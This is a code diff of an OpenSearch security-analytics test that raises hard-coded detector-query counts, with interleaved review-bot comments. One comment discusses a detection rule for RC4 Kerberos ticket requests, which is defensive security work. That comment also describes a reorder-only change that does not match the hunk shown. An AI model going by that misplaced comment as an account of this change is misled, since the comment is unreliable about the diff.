a/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java +++ b/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java @@ -1725,7 +1725,7 @@ public void testAzureMappings() throws IOException { createDetector(detector); List hits = executeSearch(".opensearch-sap-azure-detectors-queries-000001", matchAllSearchBody); - Assert.assertEquals(60, hits.size()); + Assert.assertEquals(127, hits.size()); } public void testADLDAPMappings() throws IOException { 
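Review bot: The `computer_acct` exclusion is `service|startswith: '$'`, but computer accounts carry the `$` at the end of the name (`HOST$`), so a prefix test excludes nothing and every RC4 TGS request for a machine account reaches the alert; the Windows rule this mirrors, as I recall, excludes `ServiceName|endswith: '$'`. Unless the Zeek kerberos.log `service` field is formatted differently in this deployment, this should read `service|endswith: '$'`. The hunk only reorders and reindents the block, so the bug predates it, but it is the one change that would make the `not computer_acct` clause do anything.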
@@ -1775,7 +1775,7 @@ public void testCloudtrailMappings() throws IOException {
 createDetector(detector);
 List hits = executeSearch(".opensearch-sap-cloudtrail-detectors-queries-000001", matchAllSearchBody);
- Assert.assertEquals(32, hits.size());
+ Assert.assertEquals(40, hits.size());
 }
 public void testS3Mappings() throws IOException {
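Review bot: `Assert.assertEquals(40, hits.size())` hard-codes the number of generated detector queries, and this patch bumps it (32→40 here, 60→127 in `testAzureMappings`) purely as a by-product of adding rule files; the assertion therefore says nothing about which rules loaded, only that the drop happened to yield that count, and it will break again on the next rule import. Deriving the expected value from the number of rule files under the corresponding resource directory (presumably the `rules/<category>` tree this patch adds to), or at least hoisting the numbers into named constants next to the rule lists, would make the intent explicit and the failure informative. `testCloudtrailMappings` begins above this hunk.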